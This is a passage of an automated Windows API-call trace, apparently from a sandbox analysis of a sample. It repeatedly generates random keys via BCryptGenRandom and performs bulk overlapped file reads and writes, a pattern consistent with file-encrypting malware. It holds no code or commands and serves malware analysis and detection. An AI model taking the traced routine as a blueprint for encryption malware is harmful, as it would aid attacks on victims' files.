lpOverlapped=0x2fafc18) returned 1 [0196.731] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.732] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0196.732] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.732] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0196.733] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.733] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.733] free (_Block=0x3e305b8) [0196.733] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.733] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.733] free (_Block=0x1fa91d0) [0196.733] free (_Block=0x1fa2ed8) [0196.733] free (_Block=0x1fa90b8) [0196.733] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0196.733] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.739] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x8cbe, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0196.742] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.743] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x2520, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0196.743] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.952] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x68ba, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.954] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.954] CloseHandle (hObject=0x3cc) returned 1 [0196.954] free (_Block=0x1ff1e60) [0196.954] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.963] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0196.964] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0196.964] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.964] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.964] free (_Block=0x3e305b8) [0196.965] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.965] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.965] free (_Block=0x1fa91d0) [0196.965] free (_Block=0x1fa2ed8) [0196.965] free (_Block=0x1fa90b8) [0196.965] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0196.967] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1d40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0197.126] CloseHandle (hObject=0x3cc) returned 1 [0197.126] free (_Block=0x3df0008) [0197.126] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0197.137] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.137] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0197.138] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.138] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0197.138] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.138] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.138] free (_Block=0x3e305b8) [0197.138] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.139] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.139] free (_Block=0x1fa91d0) [0197.139] free (_Block=0x1fa2ed8) [0197.139] free (_Block=0x1fa90b8) [0197.139] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0197.139] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0197.150] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.150] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0197.150] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.151] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0197.151] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.151] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.151] free (_Block=0x3e305b8) [0197.151] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.151] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.152] free (_Block=0x1fa91d0) [0197.152] free (_Block=0x1fa2ed8) [0197.152] free (_Block=0x1fa90b8) [0197.152] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.152] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0197.160] CloseHandle (hObject=0x338) returned 1 [0197.160] free (_Block=0x3d70450) [0197.160] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0197.169] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x77f0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0197.182] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0197.197] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1522, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0197.213] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0197.217] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6632, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.218] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.402] CloseHandle (hObject=0x330) returned 1 [0199.402] free (_Block=0x3df0008) [0199.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.415] CloseHandle (hObject=0x170) returned 1 [0199.415] free (_Block=0x1ff1e60) [0199.415] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.423] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xdb00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0199.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.428] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x953a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0199.429] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.439] WriteFile (in: hFile=0x2a4, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x2fe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0199.439] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.453] CloseHandle (hObject=0x338) returned 1 [0199.454] free (_Block=0x3e70008) [0199.454] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.468] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x5a2b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0199.470] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.470] CloseHandle (hObject=0x3cc) returned 1 [0199.470] free (_Block=0x3d70450) [0199.470] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.473] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x25c1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0199.474] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.474] CloseHandle (hObject=0x308) returned 1 [0199.474] free (_Block=0x3ef0008) [0199.474] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.481] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.482] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0199.482] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.482] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0199.482] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.482] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.482] free (_Block=0x3e305b8) [0199.483] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.483] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.483] free (_Block=0x1fa91d0) [0199.483] free (_Block=0x1fa2ed8) [0199.483] free (_Block=0x1fa90b8) [0199.483] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.502] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.503] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0199.503] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.503] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0199.504] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.504] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.504] free (_Block=0x3e305b8) [0199.504] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.504] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.504] free (_Block=0x1fa91d0) [0199.504] free (_Block=0x1fa2ed8) [0199.504] free (_Block=0x1fa90b8) [0199.504] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.505] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.515] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x4d90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0199.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.528] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3372, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0199.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.601] CloseHandle (hObject=0x330) returned 1 [0199.601] free (_Block=0x3e70008) [0199.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.605] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xcea0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0199.605] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.675] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.675] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.714] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xb2e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.714] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.715] CloseHandle (hObject=0x3cc) returned 1 [0199.715] free (_Block=0x1ff1e60) [0199.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.725] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.725] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0199.725] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.725] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0199.725] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.726] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.726] free (_Block=0x3e305b8) [0199.726] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.726] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.726] free (_Block=0x1fa91d0) [0199.726] free (_Block=0x1fa2ed8) [0199.726] free (_Block=0x1fa90b8) [0199.726] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.727] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0199.735] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.735] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0199.736] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.736] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0199.736] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.736] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.736] free (_Block=0x3e305b8) [0199.736] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.736] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.737] free (_Block=0x1fa91d0) [0199.737] free (_Block=0x1fa2ed8) [0199.737] free (_Block=0x1fa90b8) [0199.737] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.737] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, 